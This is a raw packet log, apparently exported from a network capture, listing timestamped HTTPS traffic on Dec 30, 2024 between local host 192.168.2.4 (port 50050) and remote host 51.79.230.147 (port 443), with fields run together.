                                                                                                                                                                                Dec 30, 2024 19:45:13.905730963 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.905749083 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.905905962 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.905921936 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.905996084 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.906003952 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.906059980 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.906213999 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.990891933 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.990910053 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.990952969 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.990962982 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.990978956 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.990978956 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.990989923 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.990995884 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991010904 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991024971 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991063118 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991067886 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991117001 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991215944 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991234064 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991265059 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991271973 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991281986 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991309881 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991503000 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991518974 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991569996 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991576910 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991620064 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991802931 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991823912 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991882086 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.991889000 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.991935015 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992233992 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992249966 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992284060 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992295027 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992314100 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992326021 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992541075 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992559910 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992588997 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992598057 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992621899 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992635965 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992850065 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992868900 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992907047 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.992913008 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:13.992944956 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:13.993148088 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.077647924 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.077671051 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.077718019 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.077728987 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.077759027 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.077780008 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.077935934 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.077953100 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.077991009 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078002930 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078027010 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078037024 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078227997 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078243971 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078289986 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078296900 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078336954 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078514099 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078531981 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078582048 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078588009 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078629971 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078767061 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078782082 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078831911 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.078840017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.078885078 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079186916 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079202890 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079269886 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079276085 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079334974 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079456091 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079468012 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079474926 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079511881 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079519033 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079547882 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079562902 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079715014 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079731941 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079777956 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.079786062 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.079828024 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.080893993 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.164613008 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.164632082 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.164705038 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.164714098 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.164757967 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.164915085 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.164930105 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.164973974 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.164982080 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165056944 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165349007 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165364027 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165420055 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165427923 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165467024 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165630102 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165657043 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165707111 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165708065 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165719986 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165740967 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165741920 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165767908 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165776014 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.165787935 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.165817976 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166038990 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166057110 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166096926 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166102886 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166131020 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166142941 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166254044 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166364908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166379929 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166429996 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.166438103 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.166477919 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.167431116 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.168972969 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.168989897 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.169048071 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.169058084 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.169106007 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.169802904 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.251519918 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251538038 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251631021 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.251641989 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251683950 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.251771927 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251790047 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251842022 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.251849890 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.251890898 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252266884 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252284050 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252331018 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252337933 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252348900 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252367020 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252381086 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252387047 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252398968 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252439976 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252732992 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252746105 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252785921 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252793074 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252803087 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252832890 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252887964 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252902985 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252933025 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252938986 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.252969027 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.252984047 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.253292084 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.253307104 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.253382921 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.253390074 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.253446102 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.254295111 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.255189896 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.255203962 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.255270958 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.255278111 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.255335093 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.259430885 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.338491917 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338514090 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338717937 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.338733912 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338778019 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.338884115 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338896036 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338944912 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.338953972 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.338995934 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339303017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339329958 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339379072 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339385986 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339426041 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339499950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339514017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339562893 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339570999 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339610100 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339739084 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339752913 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339799881 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339806080 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339845896 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.339962006 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.339988947 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.340046883 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.340053082 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.340073109 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.340085983 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.340303898 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.340318918 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.340356112 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.340361118 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.340404034 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.340413094 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.342072964 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.342087030 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.342127085 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.342133045 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.342158079 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.342176914 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.354588985 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425416946 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425432920 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425520897 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425537109 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425611973 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425633907 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425694942 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425694942 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425704002 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.425735950 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425744057 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.425986052 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426000118 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426049948 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426055908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426100969 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426462889 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426476955 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426537037 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426552057 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426594973 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426738977 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426753044 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426810980 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426816940 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426858902 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426882982 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426901102 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.426954031 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.426960945 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.427006006 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.427253008 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.427268982 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.427323103 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.427329063 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.427371025 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.429029942 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.429044962 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.429105043 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.429112911 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.429155111 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.432679892 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.512609959 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512629032 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512763023 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512804985 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512813091 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.512829065 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512845039 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.512845039 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.512957096 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.512978077 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513009071 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.513017893 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513045073 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.513382912 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513403893 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513443947 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.513449907 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513463974 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:14.513633013 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513653994 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:14.513699055 CET50050443192.168.2.451.79.230.147
